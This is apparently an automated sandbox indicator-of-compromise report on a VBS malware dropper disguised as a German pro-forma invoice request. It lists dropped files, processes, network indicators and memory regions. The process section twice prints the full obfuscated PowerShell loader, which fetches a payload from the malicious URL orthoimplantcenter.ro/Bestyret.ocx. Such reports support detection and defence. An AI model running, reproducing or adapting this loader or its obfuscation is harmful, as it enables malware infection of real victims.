IOC Report
Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs

Files

File Path | Type | Category | Malicious
Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs | ASCII text, with CRLF line terminators | initial sample | malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression | dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | data | dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | data | modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | data | dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l30usody.dgt.ps1 | ASCII text, with no line terminators | dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qeygavsh.bih.psm1 | ASCII text, with no line terminators | dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qltk43lb.rg3.psm1 | ASCII text, with no line terminators | dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ur1ensrl.2se.ps1 | ASCII text, with no line terminators | dropped
C:\Users\user\AppData\Roaming\Kinetoplast.Liq | ASCII text, with very long lines (65536), with no line terminators | dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs"
malicious
C:\Windows\System32\PING.EXE
ping gormezl_6777.6777.6777.677e
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . 
git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. 
BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNsketGrshi Indg AuthUneqekampd K ne lufnPol s Paa]Unma=Helv$ S ro P.erRan iTricgHotei SunnOuttaJerntSkare ygi ');$Praege=Lymnaeid 'Forl$.denG MeeyChapmBlitns.staoutrsOpdyi SpeuAfblmKoll. RusDIneqoN nfwSupenTaarlKommoteglaPsykd AmeF Humi Surl EskeS,em(Vesi$ LanAg.itdU koaFortp Ta tSprii C.avState E.tlDopey Klo, Sel$ Ap cad ehConceMatheSusts Ho e Ge mpolio counPrergTraue SkarPreei KvanAmt,gP ed)Abse ';$cheesemongering=$Odisere;Orfrays (Lymnaeid ' Cen$UnfogS raLReceOPermBcel.aUkvalLevi: Kd RAa sEs.ollUne,A imltAddiiDansvBrusEUndetLed S Med= ,er( StiTDenoESlagsrootTurte-frigpPhalaWil TOverHglyc Hush$P vecSoveHTrumeManke iblS TriEPrecm SamO R pn E kgBogsEUngurAdreiTwe nPreigBo t)Sol ');while (!$Relativets) {Orfrays (Lymnaeid ' van$IndsgUndelS,nsoVibrbFolkaPo,yl A.p:vandSF yvcRakeuWinit,lbaiInkobjupor ffia Joun,mascG nahAllei ForaHead=En o$Tetrt SvorVr guSamkeTamb ') ;Orfrays $Praege;Orfrays (Lymnaeid ',ondsKorntHjerAwhi R Hidt ara-Ca tSHaevlSaksE,nineJ erpPenn Rot4Tele ');Orfrays (Lymnaeid 'Eksa$SquiG NonlSippO etbTiliAParilMist:KeyeR enaeTherlOpslaUndet .agi Catv U.meRkketB ags ann=Haan(G osTForrETurbSBlysTIceq- S.mpAfkaAUndetRecaHGirn Sig$ optCBarbhB ckeCem eSimiSJensEHutcMKjolo Supn,xiogPl dESen.rAnt iBr mNPr fGUn.a)inte ') ;Orfrays (Lymnaeid ' Pro$BestgLugtLPallOPro BAfteABlokLP rt:StivtTeleOH,veRLotht VarUBlocRgrafR Klbe FlidOvals P,rK,visaStvlBPalmeTrk,RRrgtnRdl eLive= For$ExhiGUnshl JamONysgBAfdeaUnflLAbst:SuitRInteY s tT BriTIntoEUn ursvarSAbonkJerseArriREmignUd.ae Ove+ .ac+ Ov.%B an$JantDMentOMarcbKameBBl,vE ModL ProtKhelH Faketrstd None Shyr.einN vinefortSPant.EndecagroOInwrUBra N,nsttAvli ') ;$Adaptively=$Dobbelthedernes[$Torturredskaberne];}$Raatret=335849;$Afft=30088;Orfrays (Lymnaeid 'Vag.$UdlngFablL P eOTh wbOmniaPerklfeud: ranMU ilIWi tLMetaJ 
lmobCopuEUdklS .obkLandy FalTTr ntSasheSteml aulsDoorEKontSPreaSSpooeBrneKHypstUlykO ConrSkri ear,= dou orsGKlimeKultT Eu -PunnCBilaOCo tNIslnTGrovE tarn C,ptskyd Stat$LnfrCTen hDireeAffeEReinsCercE esaMMaleOFluoN onsGRoseEPlairStavi npaNBenhg Ego ');Orfrays (Lymnaeid 'Peri$Embrg QuilSu.foBallbFod a AdelF rb:HabrV autigebermaniiRekrdLoveiJensgrecoeOpdrnEfteo Benu GossHors Heli=hous Krop[SionSRepryAlonsErintK,seeD ffmBest.Bes,CCentoEmannVennv skee RecrSpintD.ms] Und:Falc:NummFStasr Ejeo FalmDvalBproraVedlsAcroeBeed6V by4 ChrSOmskt ForrPolsiFolknOverg Pr (Pels$BedyMDikki F.rl orjFordbBorse IldsDrunkL neyLungt Sp t FraeVu.glT.ansOmste PresSquosI tre FibkBiblt uloCaderBom ) Zoo ');Orfrays (Lymnaeid ' Kom$ Ba gFleelOrgaO amsbHe,eaDobblDo n:BagtY isln,eunkDalrSLotho ccoMIfres,erotSve Ktti=,yrr seu[Precs H sYFo ksRistTJunkeAfklmPyro.raasTEftee RegxNedvtShun. Arme.nfenKatnCkindoMangdLepti k inMariG na]Over:Nonc:KalaAK,glsPimpcAdeaIkermI Lie.RumngF lse M ktAntesBlo,TManirExpoiAlien E sG Min(Inc $E,epvKolliAngiR ajiAnlgd gneIWilegUddiEHy,eNSi koKommuMi is G a)Verf ');Orfrays (Lymnaeid 'Stro$NonsGBispl ejogirabPe oaSpisl iml:LangTLam H ForaKardnPrefa .oyTBi loHudaLDarkONoncg ubm=Taal$ReviY adeNPallK Tras G eOS arMForsS Po,TM rp. scasBesmuUnnaBSkjosEn.iTInterCav.IvrtsNGa.mG Unw(.rev$GymnrSubcAA toAUndeTAstrR Br.eDesutBog ,Inte$MythaForrfAva,Frailt Vil) Rub ');Orfrays $Thanatolog;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . 
git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. 
BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNsketGrshi Indg AuthUneqekampd K ne lufnPol s Paa]Unma=Helv$ S ro P.erRan iTricgHotei SunnOuttaJerntSkare ygi ');$Praege=Lymnaeid 'Forl$.denG MeeyChapmBlitns.staoutrsOpdyi SpeuAfblmKoll. RusDIneqoN nfwSupenTaarlKommoteglaPsykd AmeF Humi Surl EskeS,em(Vesi$ LanAg.itdU koaFortp Ta tSprii C.avState E.tlDopey Klo, Sel$ Ap cad ehConceMatheSusts Ho e Ge mpolio counPrergTraue SkarPreei KvanAmt,gP ed)Abse ';$cheesemongering=$Odisere;Orfrays (Lymnaeid ' Cen$UnfogS raLReceOPermBcel.aUkvalLevi: Kd RAa sEs.ollUne,A imltAddiiDansvBrusEUndetLed S Med= ,er( StiTDenoESlagsrootTurte-frigpPhalaWil TOverHglyc Hush$P vecSoveHTrumeManke iblS TriEPrecm SamO R pn E kgBogsEUngurAdreiTwe nPreigBo t)Sol ');while (!$Relativets) {Orfrays (Lymnaeid ' van$IndsgUndelS,nsoVibrbFolkaPo,yl A.p:vandSF yvcRakeuWinit,lbaiInkobjupor ffia Joun,mascG nahAllei ForaHead=En o$Tetrt SvorVr guSamkeTamb ') ;Orfrays $Praege;Orfrays (Lymnaeid ',ondsKorntHjerAwhi R Hidt ara-Ca tSHaevlSaksE,nineJ erpPenn Rot4Tele ');Orfrays (Lymnaeid 'Eksa$SquiG NonlSippO etbTiliAParilMist:KeyeR enaeTherlOpslaUndet .agi Catv U.meRkketB ags ann=Haan(G osTForrETurbSBlysTIceq- S.mpAfkaAUndetRecaHGirn Sig$ optCBarbhB ckeCem eSimiSJensEHutcMKjolo Supn,xiogPl dESen.rAnt iBr mNPr fGUn.a)inte ') ;Orfrays (Lymnaeid ' Pro$BestgLugtLPallOPro BAfteABlokLP rt:StivtTeleOH,veRLotht VarUBlocRgrafR Klbe FlidOvals P,rK,visaStvlBPalmeTrk,RRrgtnRdl eLive= For$ExhiGUnshl JamONysgBAfdeaUnflLAbst:SuitRInteY s tT BriTIntoEUn ursvarSAbonkJerseArriREmignUd.ae Ove+ .ac+ Ov.%B an$JantDMentOMarcbKameBBl,vE ModL ProtKhelH Faketrstd None Shyr.einN vinefortSPant.EndecagroOInwrUBra N,nsttAvli ') ;$Adaptively=$Dobbelthedernes[$Torturredskaberne];}$Raatret=335849;$Afft=30088;Orfrays (Lymnaeid 'Vag.$UdlngFablL P eOTh wbOmniaPerklfeud: ranMU ilIWi tLMetaJ 
lmobCopuEUdklS .obkLandy FalTTr ntSasheSteml aulsDoorEKontSPreaSSpooeBrneKHypstUlykO ConrSkri ear,= dou orsGKlimeKultT Eu -PunnCBilaOCo tNIslnTGrovE tarn C,ptskyd Stat$LnfrCTen hDireeAffeEReinsCercE esaMMaleOFluoN onsGRoseEPlairStavi npaNBenhg Ego ');Orfrays (Lymnaeid 'Peri$Embrg QuilSu.foBallbFod a AdelF rb:HabrV autigebermaniiRekrdLoveiJensgrecoeOpdrnEfteo Benu GossHors Heli=hous Krop[SionSRepryAlonsErintK,seeD ffmBest.Bes,CCentoEmannVennv skee RecrSpintD.ms] Und:Falc:NummFStasr Ejeo FalmDvalBproraVedlsAcroeBeed6V by4 ChrSOmskt ForrPolsiFolknOverg Pr (Pels$BedyMDikki F.rl orjFordbBorse IldsDrunkL neyLungt Sp t FraeVu.glT.ansOmste PresSquosI tre FibkBiblt uloCaderBom ) Zoo ');Orfrays (Lymnaeid ' Kom$ Ba gFleelOrgaO amsbHe,eaDobblDo n:BagtY isln,eunkDalrSLotho ccoMIfres,erotSve Ktti=,yrr seu[Precs H sYFo ksRistTJunkeAfklmPyro.raasTEftee RegxNedvtShun. Arme.nfenKatnCkindoMangdLepti k inMariG na]Over:Nonc:KalaAK,glsPimpcAdeaIkermI Lie.RumngF lse M ktAntesBlo,TManirExpoiAlien E sG Min(Inc $E,epvKolliAngiR ajiAnlgd gneIWilegUddiEHy,eNSi koKommuMi is G a)Verf ');Orfrays (Lymnaeid 'Stro$NonsGBispl ejogirabPe oaSpisl iml:LangTLam H ForaKardnPrefa .oyTBi loHudaLDarkONoncg ubm=Taal$ReviY adeNPallK Tras G eOS arMForsS Po,TM rp. scasBesmuUnnaBSkjosEn.iTInterCav.IvrtsNGa.mG Unw(.rev$GymnrSubcAA toAUndeTAstrR Br.eDesutBog ,Inte$MythaForrfAva,Frailt Vil) Rub ');Orfrays $Thanatolog;"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name | IP | Malicious
http://nuget.org/NuGet.exe | unknown
http://crl.micro | unknown
http://pesterbdd.com/images/Pester.png | unknown
https://aka.ms/pscore6lB_q | unknown
https://orthoimplantcenter.ro | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | unknown
https://go.micro | unknown
https://contoso.com/ | unknown
https://nuget.org/nuget.exe | unknown
https://contoso.com/License | unknown
https://contoso.com/Icon | unknown
http://orthoimplantcenter.ro | unknown
https://orthoimplantcenter.ro/Bestyret.ocx | 188.241.183.45
https://aka.ms/pscore68 | unknown
http://wicroft.com | unknown
https://orthoimplantcenter.ro/Bestyret.ocxXR1lX | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | unknown
https://github.com/Pester/Pester | unknown

Domains

Name | IP | Malicious
gormezl_6777.6777.6777.677e | unknown | malicious
bg.microsoft.map.fastly.net | 199.232.214.172
orthoimplantcenter.ro | 188.241.183.45

IPs

IP | Domain | Country | Malicious
188.241.183.45 | orthoimplantcenter.ro | Romania

Registry

Path | Value | Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileDirectory

Memdumps

Base Address | Regiontype | Protect | Malicious
5F1A000 | trusted library allocation | page read and write | malicious
95EB000 | direct allocation | page execute and read and write | malicious
1DE999BE000 | trusted library allocation | page read and write | malicious
8A40000 | direct allocation | page execute and read and write | malicious
356B000 | heap | page read and write
1B470DC3000 | heap | page read and write
1B834FB000 | stack | page read and write
1B470C95000 | heap | page read and write
1B470C72000 | heap | page read and write
7FFE7E150000 | trusted library allocation | page read and write
7FFE7E110000 | trusted library allocation | page read and write
4EC7000 | trusted library allocation | page read and write
1B470B27000 | heap | page read and write
1B470C80000 | heap | page read and write
926FEBE000 | stack | page read and write
7FFE7DF9C000 | trusted library allocation | page execute and read and write
8427000 | stack | page read and write
73C0000 | heap | page read and write
1DE87F9F000 | heap | page read and write
73D0000 | heap | page read and write
1B470C21000 | heap | page read and write
1B470B43000 | heap | page read and write
32C0000 | heap | page read and write
1B827FA000 | stack | page read and write
7FFE7E250000 | trusted library allocation | page read and write
1B46EE01000 | heap | page read and write
1B470CD0000 | heap | page read and write
1DE897E0000 | trusted library allocation | page read and write
1DE87E30000 | heap | page read and write
1B470D71000 | heap | page read and write
3130000 | trusted library allocation | page read and write
9410000 | direct allocation | page execute and read and write
3170000 | heap | page readonly
3120000 | trusted library allocation | page read and write
4D60000 | heap | page read and write
791E000 | stack | page read and write
8780000 | trusted library allocation | page read and write
1DEA2092000 | heap | page read and write
1B46EE35000 | heap | page read and write
1B470CD8000 | heap | page read and write
1DE89E43000 | trusted library allocation | page read and write
7FFE7E230000 | trusted library allocation | page read and write
1B46EE62000 | heap | page read and write
1DE89DE9000 | trusted library allocation | page read and write
3114000 | trusted library allocation | page read and write
1DE8B6F4000 | trusted library allocation | page read and write
1B470CD7000 | heap | page read and write
1DE89951000 | trusted library allocation | page read and write
1DEA20B6000 | heap | page read and write
926FF3E000 | stack | page read and write
8A10000 | trusted library allocation | page read and write
5F01000 | trusted library allocation | page read and write
1B82BFE000 | stack | page read and write
1DE8B6CB000 | trusted library allocation | page read and write
7FFE7E200000 | trusted library allocation | page read and write
1DEA213E000 | heap | page read and write
1DE8A04A000 | trusted library allocation | page read and write
1B470C57000 | heap | page read and write
313A000 | trusted library allocation | page execute and read and write
85A4000 | heap | page read and write
3100000 | trusted library allocation | page read and write
1B470B53000 | heap | page read and write
7FFE7E0C2000 | trusted library allocation | page read and write
1B470C80000 | heap | page read and write
1B470CA9000 | heap | page read and write
1A59FE60000 | heap | page read and write
1DE87F5A000 | heap | page read and write
1DEA1E50000 | heap | page read and write
1B470CDD000 | heap | page read and write
8A20000 | trusted library allocation | page read and write
1B470B53000 | heap | page read and write
8AF0000 | direct allocation | page read and write
1B470C78000 | heap | page read and write
7FFE7DF90000 | trusted library allocation | page read and write
1B82EFF000 | stack | page read and write
533E000 | trusted library allocation | page read and write
1B470CA5000 | heap | page read and write
8560000 | heap | page read and write
7FFE7E180000 | trusted library allocation | page read and write
1B470B6F000 | heap | page read and write
1B470C57000 | heap | page read and write
7FFE7E220000 | trusted library allocation | page read and write
7A10000 | trusted library allocation | page read and write
1DEA2174000 | heap | page read and write
1B470B3F000 | heap | page read and write
1DE87F9D000 | heap | page read and write
1A59FD60000 | heap | page read and write
1B470DF1000 | heap | page read and write
1B470C80000 | heap | page read and write
335F000 | heap | page read and write
7FFE7E260000 | trusted library allocation | page read and write
1DE881C5000 | heap | page read and write
1DEA2068000 | heap | page read and write
1B470CE3000 | heap | page read and write
32CC000 | heap | page read and write
7FFE7E1B0000 | trusted library allocation | page read and write
3180000 | heap | page read and write
8A50000 | trusted library allocation | page read and write
7FFE7E0E0000 | trusted library allocation | page read and write
1B470C72000 | heap | page read and write
1B470CF9000 | heap | page read and write
1DE87F64000 | heap | page read and write
1B470C95000 | heap | page read and write
1B470C80000 | heap | page read and write
1DE99C39000 | trusted library allocation | page read and write
1B830FC000 | stack | page read and write
7FFE7E0B0000 | trusted library allocation | page execute and read and write
8510000 | trusted library allocation | page read and write
1B470D20000 | heap | page read and write
9270B0D000 | stack | page read and write
7FFE7E080000 | trusted library allocation | page read and write
1B470B4F000 | heap | page read and write
7FFE7E1F0000 | trusted library allocation | page read and write
76BF000 | heap | page read and write
1B470C46000 | heap | page read and write
8950000 | heap | page read and write
7FFE7E140000 | trusted library allocation | page read and write
7980000 | trusted library allocation | page read and write
1DE8A503000 | trusted library allocation | page read and write
7FFE7E09A000 | trusted library allocation | page read and write
7FFE7E091000 | trusted library allocation | page read and write
1B470B33000 | heap | page read and write
1DE881A0000 | heap | page readonly
1B470CDA000 | heap | page read and write
927003C000 | stack | page read and write
4D1E000 | stack | page read and write
8440000 | trusted library allocation | page read and write
1B470B27000 | heap | page read and write
7630000 | heap | page read and write
7A00000 | trusted library allocation | page read and write
1DE89947000 | heap | page read and write
7761000 | heap | page read and write
5F15000 | trusted library allocation | page read and write
1B470C80000 | heap | page read and write
1B470C95000 | heap | page read and write
8A30000 | trusted library allocation | page read and write
1B470C97000 | heap | page read and write
1DE87F62000 | heap | page read and write
1B46EDBC000 | heap | page read and write
1B470B3A000 | heap | page read and write
1DEA2064000 | heap | page read and write
1B46EDFF000 | heap | page read and write
9270B8B000 | stack | page read and write
7FFE7E0C5000 | trusted library allocation | page read and write
1B470C92000 | heap | page read and write
7260000 | heap | page execute and read and write
3185000 | heap | page read and write
1DEA23B0000 | heap | page read and write
855B000 | trusted library allocation | page read and write
1B470CA9000 | heap | page read and write
1DEA205C000 | heap | page read and write
1B46EF40000 | heap | page read and write
1B470B21000 | heap | page read and write
1B46ED79000 | heap | page read and write
311D000 | trusted library allocation | page execute and read and write
1DE89B78000 | trusted library allocation | page read and write
1B470B6F000 | heap | page read and write
1B470C53000 | heap | page read and write
3560000 | heap | page read and write
1B470CA9000 | heap | page read and write
1B470D21000 | heap | page read and write
1B46ED99000 | heap | page read and write
1B46EBD0000 | heap | page read and write
7670000 | heap | page read and write
1B46EEA0000 | remote allocation | page read and write
1B470CF9000 | heap | page read and write
1B831FF000 | stack | page read and write
1B470CA5000 | heap | page read and write
1B470C80000 | heap | page read and write
1DE87F10000 | heap | page read and write
1DE89945000 | heap | page read and write
7FFE7DFC6000 | trusted library allocation | page execute and read and write
1DE99971000 | trusted library allocation | page read and write
79F0000 | trusted library allocation | page read and write
1B470B28000 | heap | page read and write
1B470CE3000 | heap | page read and write
4D5E000 | stack | page read and write
1B46EDE9000 | heap | page read and write
1B46EE1F000 | heap | page read and write
1DE99960000 | trusted library allocation | page read and write
1B470B23000 | heap | page read and write
4134CFF000 | unknown | page read and write
1B470B27000 | heap | page read and write
1B470C72000 | heap | page read and write
1B470B23000 | heap | page read and write
85ED000 | heap | page read and write
1B470B26000 | heap | page read and write
7258000 | trusted library allocation | page read and write
1B46EF48000 | heap | page read and write
75DE000 | stack | page read and write
4134C7B000 | stack | page read and write
1DE899D5000 | trusted library allocation | page read and write
1DE99951000 | trusted library allocation | page read and write
7FFE7E0F0000 | trusted library allocation | page read and write
7250000 | trusted library allocation | page read and write
1B470C38000 | heap | page read and write
1B470CA5000 | heap | page read and write
1B470CA5000 | heap | page read and write
7DF4E7210000 | trusted library allocation | page execute and read and write
1B46EE62000 | heap | page read and write
85BB000 | heap | page read and write
9270A88000 | stack | page read and write
1DEA1F03000 | heap | page read and write
926FD38000 | stack | page read and write
3550000 | trusted library allocation | page read and write
1B470CD1000 | heap | page read and write
1B470B4A000 | heap | page read and write
326C000 | stack | page read and write
7FFE7E0D0000 | trusted library allocation | page execute and read and write
926FDBC000 | stack | page read and write
8430000 | trusted library allocation | page read and write
8530000 | trusted library allocation | page read and write
1DE8AD57000 | trusted library allocation | page read and write
1B470CA9000 | heap | page read and write
1B470C72000 | heap | page read and write
926F9FC000 | stack | page read and write
79D0000 | trusted library allocation | page read and write
1DE8A4E1000 | trusted library allocation | page read and write
1B470CBF000 | heap | page read and write
1B470B6F000 | heap | page read and write
1B470CA9000 | heap | page read and write
1DE87D50000 | heap | page read and write
1DE89810000 | trusted library allocation | page read and write
8570000 | heap | page read and write
1B470C72000 | heap | page read and write
7FFE7E170000 | trusted library allocation | page read and write
